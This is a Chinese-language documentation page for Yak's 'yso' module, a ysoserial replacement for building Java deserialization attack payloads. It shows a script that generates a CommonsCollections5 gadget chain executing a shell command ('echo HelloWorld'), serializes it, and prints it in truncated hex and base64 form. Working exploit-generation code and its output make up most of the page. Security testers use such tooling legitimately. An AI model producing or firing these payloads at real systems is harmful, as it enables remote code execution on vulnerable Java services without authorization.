Skip to main content

Java 反序列化利用链: yso(ysoserial)

Yak 通过非 Java 的方式实现了一整套 Java 反序列化协议。

可以在一定容错限度内劫持绝大部分 Java 反序列化流。

详情参考 java: java 反序列化协议的 Golang/Yak 实现

YSoSerial 的 Yak 替代品#

在实现了 Java 反序列化协议后,Java 相关漏洞不再需要原生 Java 或硬编码 HEX/Binary 流来实现。

evilCls, err = yso.GetCommonsCollections5("echo HelloWorld")die(err)
bytes = java.MarshalJavaObjects(evilCls)hexStr = codec.EncodeToHex(bytes)base64Str = codec.EncodeBase64(bytes)
dump(bytes)println(hexStr + "\n")println(base64Str + "\n")
/*OUTPUT:
([]uint8) (len=2084 cap=2304) { 00000000  ac ed 00 05 73 72 00 2e  6a 61 76 61 78 2e 6d 61  |....sr..javax.ma| 00000010  6e 61 67 65 6d 65 6e 74  2e 42 61 64 41 74 74 72  |nagement.BadAttr| 00000020  69 62 75 74 65 56 61 6c  75 65 45 78 70 45 78 63  |ibuteValueExpExc| 00000030  65 70 74 69 6f 6e d4 e7  da ab 63 2d 46 40 02 00  |eption....c-F@..|                                ......                                ......                                ......                                        c 61 6e 67 2e 4e 75  |xr..java.lang.Nu| 000007c0  6d 62 65 72 86 ac 95 1d  0b 94 e0 8b 02 00 00 78  |mber...........x| 000007d0  70 00 00 00 01 73 72 00  11 6a 61 76 61 2e 75 74  |p....sr..java.ut| 000007e0  69 6c 2e 48 61 73 68 4d  61 70 05 07 da c1 c3 16  |il.HashMap......| 000007f0  60 d1 03 00 02 46 00 0a  6c 6f 61 64 46 61 63 74  |`....F..loadFact| 00000800  6f 72 49 00 09 74 68 72  65 73 68 6f 6c 64 78 70  |orI..thresholdxp| 00000810  3f 40 00 00 00 00 00 00  77 08 00 00 00 10 00 00  |?@......w.......| 00000820  00 00 78 78                                       |..xx|}
aced00057372002e6a617661782e6d616e6167656d656e74......c1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878
rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhj......HVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHg=*/